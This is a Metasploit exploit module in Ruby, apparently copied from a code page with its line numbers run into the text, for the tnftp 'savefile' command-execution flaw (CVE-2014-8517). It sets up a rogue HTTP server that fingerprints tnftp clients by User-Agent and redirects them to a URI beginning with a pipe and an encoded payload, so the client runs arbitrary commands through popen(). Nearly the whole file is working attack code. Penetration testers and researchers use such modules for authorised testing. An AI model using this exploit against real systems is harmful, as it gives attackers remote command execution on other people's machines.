Path: blob/master/modules/exploits/unix/http/tnftp_savefile.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer9include Msf::Auxiliary::Report1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'tnftp "savefile" Arbitrary Command Execution',16'Description' => %q{17This module exploits an arbitrary command execution vulnerability in18tnftp's handling of the resolved output filename - called "savefile" in19the source - from a requested resource.2021If tnftp is executed without the -o command-line option, it will resolve22the output filename from the last component of the requested resource.2324If the output filename begins with a "|" character, tnftp will pass the25fetched resource's output to the command directly following the "|"26character through the use of the popen() function.27},28'Author' => [29'Jared McNeill', # Vulnerability discovery30'wvu' # Metasploit module31],32'References' => [33['CVE', '2014-8517'],34['URL', 'https://seclists.org/oss-sec/2014/q4/459']35],36'DisclosureDate' => '2014-10-28',37'License' => MSF_LICENSE,38'Platform' => 'unix',39'Arch' => ARCH_CMD,40'Privileged' => false,41'Payload' => { 'BadChars' => '/' },42'Targets' => [['ftp(1)', {}]],43'DefaultTarget' => 0,44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)51end5253def on_request_uri(cli, request)54unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/55print_status("#{request['User-Agent']} connected")56send_not_found(cli)57return58end5960if request.uri.ends_with?(sploit)61send_response(cli, '')62print_good("Executing `#{payload.encoded}'!")63report_vuln(64:host => cli.peerhost,65:name => self.name,66:refs => self.references,67:info => request['User-Agent']68)69else70print_status("#{request['User-Agent']} connected")71print_status('Redirecting to exploit...')72send_redirect(cli, sploit_uri)73end74end7576def sploit_uri77(get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +78Rex::Text.uri_encode(sploit, 'hex-all')79end8081def sploit82"|#{payload.encoded}"83end84end858687